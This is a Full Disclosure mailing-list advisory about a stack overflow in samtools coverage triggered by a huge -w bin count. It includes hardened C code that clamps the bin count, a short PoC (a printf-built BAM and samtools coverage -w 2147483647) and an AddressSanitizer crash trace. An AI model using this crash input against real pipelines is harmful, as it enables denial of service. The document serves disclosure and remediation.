Full Disclosure mailing list archives

Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow


From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 28 Sep 2025 12:13:48 -0400

In the samtools coverage subcommand, the -w / --n-bins option lets the user
choose how many "bins" the coverage histogram is split into. The code computes:

    stats[tid].bin_width = (stats[tid].end - stats[tid].beg) / n_bins;

Whenever n_bins exceeds the region length (end - beg), this integer division
yields zero, and no check rejects that result before it is used. Later, in
print_hist(), calculations involving current_bin, row_bin_size and the loop
bounds can overflow or take invalid branches, eventually leading to recursion
or unbounded stack consumption. In practice, supplying a huge bin count
(e.g. 2147483647, i.e. INT_MAX) triggers a stack overflow in print_hist(), as
observed in the sanitizer report below, and crashes the program.
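The arithmetic described above, as an added example that is not samtools code:
the naive function mirrors the quoted division and silently returns a zero bin
width for the PoC parameters, while the hardened configuration clamps n_bins to
the region length and to an assumed fixed cap (MAX_BINS), rounds the width up so
it is never zero, keeps the histogram on the heap rather than the stack, and
maps positions to bins so the index always stays in range. The function names,
the cap value and the sample read start positions are assumptions made for
illustration.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed cap on histogram bins; samtools itself has no such constant. */
#define MAX_BINS 100000

typedef struct {
    int64_t beg, end;    /* 0-based half-open region [beg, end) */
    int64_t n_bins;      /* number of bins after clamping */
    int64_t bin_width;   /* bases per bin, always >= 1 after safe_hist_cfg() */
} hist_cfg_t;

/* Unchecked form of the division quoted in the advisory: once n_bins exceeds
 * the region length the result is 0, and every later computation that divides
 * by or multiplies with bin_width is off. The caller gets no error. */
int64_t naive_bin_width(int64_t beg, int64_t end, int64_t n_bins)
{
    return (end - beg) / n_bins;
}

/* Hardened form: reject empty regions and non-positive bin counts, clamp
 * n_bins so each bin covers at least one base, cap it at MAX_BINS so the
 * histogram size is bounded, and round the width up so the bins cover the
 * whole region. Returns 0 on success, -1 on invalid input. */
int safe_hist_cfg(int64_t beg, int64_t end, int64_t n_bins, hist_cfg_t *out)
{
    if (beg < 0 || end <= beg || n_bins <= 0 || out == NULL)
        return -1;
    int64_t len = end - beg;
    if (n_bins > len)
        n_bins = len;
    if (n_bins > MAX_BINS)
        n_bins = MAX_BINS;
    out->beg = beg;
    out->end = end;
    out->n_bins = n_bins;
    out->bin_width = (len + n_bins - 1) / n_bins; /* ceiling division, >= 1 */
    return 0;
}

/* Map a 0-based position to its bin; -1 for positions outside the region.
 * The rounded-up width can leave the last bin short, so clamp the index
 * instead of trusting the division alone. */
int64_t bin_index(const hist_cfg_t *c, int64_t pos)
{
    if (pos < c->beg || pos >= c->end)
        return -1;
    int64_t idx = (pos - c->beg) / c->bin_width;
    if (idx >= c->n_bins)
        idx = c->n_bins - 1;
    return idx;
}

/* Count read start positions per bin. The histogram lives on the heap and is
 * sized from the clamped n_bins, so a hostile -w value cannot drive a large
 * stack allocation. The caller frees the result. */
uint32_t *build_hist(const hist_cfg_t *c, const int64_t *starts, size_t n)
{
    uint32_t *hist = calloc((size_t)c->n_bins, sizeof *hist);
    if (hist == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++) {
        int64_t b = bin_index(c, starts[i]);
        if (b >= 0)
            hist[b]++;
    }
    return hist;
}

int main(void)
{
    /* The advisory's PoC: a 500,000,000 bp reference and -w 2147483647. */
    printf("naive bin_width = %" PRId64 "\n",
           naive_bin_width(0, 500000000, 2147483647));
    hist_cfg_t c;
    if (safe_hist_cfg(0, 500000000, 2147483647, &c) != 0)
        return 1;
    printf("clamped n_bins = %" PRId64 ", bin_width = %" PRId64 "\n",
           c.n_bins, c.bin_width);
    /* Constructed read start positions, not taken from any real BAM. */
    int64_t starts[] = { 0, 9, 250000000, 499999999 };
    uint32_t *hist = build_hist(&c, starts, sizeof starts / sizeof starts[0]);
    if (hist == NULL)
        return 1;
    for (int64_t b = 0; b < c.n_bins; b++)
        if (hist[b])
            printf("bin %" PRId64 " (from pos %" PRId64 "): %u\n",
                   b, c.beg + b * c.bin_width, hist[b]);
    free(hist);
    return 0;
}
```

The clamp to the region length is the check that matters for the reported
input: with 500,000,000 bases and INT_MAX bins the naive width is 0, while the
hardened path reduces n_bins before dividing so every bin is at least one base
wide and the allocation is bounded regardless of what the user passes to -w.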


*Impact:*

   - Denial of Service (DoS): any caller who controls the -w value crashes
     the samtools process.
   - Memory corruption: claimed, but not demonstrated by the report below,
     which shows stack exhaustion (a stack-overflow signal) rather than an
     out-of-bounds write.

*PoC (Proof of Concept)*
Create a minimal BAM with a large declared reference size and one read. The
SAM text is three lines (an @HD header, an @SQ header declaring chrX as
500,000,000 bp, and one 10-base alignment), so the record separators must be
newlines:

printf '@HD\tVN:1.6\n@SQ\tSN:chrX\tLN:500000000\nr1\t0\tchrX\t1\t60\t10M\t*\t0\t0\tAAAAAAAAAA\tIIIIIIIIII\n' \
  | ./samtools view -b -o huge.bam -
./samtools index huge.bam

Run coverage with a massive bin count:
./samtools coverage -w 2147483647 huge.bam


*Expected crash:*

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1070796==ERROR: AddressSanitizer: stack-overflow on address 0xfffef18a7ff0 (pc 0xab400a2993cc bp 0xffffdff5a910 sp 0xfffef18a7ff0 T0)
    #0 0xab400a2993cc in print_hist /root/samtools/coverage.c:236:22
    #1 0xab400a29c304 in main_coverage /root/samtools/coverage.c:674:13
    #2 0xab400a286044 in main /root/samtools/bamtk.c:271:55
    #3 0xff6004352290 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #4 0xff6004352374 in __libc_start_main csu/../csu/libc-start.c:360:3
    #5 0xab400a15cc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)

SUMMARY: AddressSanitizer: stack-overflow /root/samtools/coverage.c:236:22 in print_hist
==1070796==ABORTING
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/